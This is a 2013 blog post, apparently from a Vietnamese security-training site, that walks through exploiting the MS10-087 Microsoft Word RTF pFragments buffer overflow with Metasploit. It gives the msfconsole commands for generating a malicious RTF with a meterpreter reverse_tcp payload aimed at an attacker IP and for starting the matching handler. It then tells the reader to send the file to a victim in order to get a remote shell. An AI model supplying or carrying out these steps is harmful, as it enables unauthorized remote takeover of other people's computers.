Được tạo bởi Blogger.

Lưu trữ Blog

Home » » Hack any PC in LAN using MS Office Buffer Overflow Attack

Hack any PC in LAN using MS Office Buffer Overflow Attack

Written By Unknown on Thứ Sáu, 6 tháng 12, 2013 | 23:13

Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
This module exploits a stack-based buffer overflow in the handling of the ‘pFragments’ shape property within the Microsoft Word RTF parser. All versions of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting. It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that Microsoft will confirm or deny this since Office 2000 has reached its support cycle end-of-life
Exploit Targets
1 – Microsoft Office 2002 SP3 English on Windows XP SP3 English
2 – Microsoft Office 2003 SP3 English on Windows XP SP3 English
3 – Microsoft Office 2007 SP0 English on Windows XP SP3 English
4 – Microsoft Office 2007 SP0 English on Windows Vista SP0 English
5 – Microsoft Office 2007 SP0 English on Windows 7 SP0 English
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
Msf exploit (ms10_087_rtf_pfragments_bof)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_087_rtf_pfragments_bof)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (ms10_087_rtf_pfragments_bof)>exploit

After we successfully generate the malicious rtf, it will stored on your local computer
/root/.msf4/local/msf.rtf
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send your msf.rtf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer
Share this article :

0 nhận xét:

Đăng nhận xét

 
Đăng Kí Học Trực Tuyến : Chương Trình Đào Tạo Security365 | Ethical Haking | SiSSP
Copyright © 2013. an toan thong tin - All Rights Reserved
Web Master @ Nguyen Tran Tuong Vinh
Tech Support @ Bang Tran Ngoc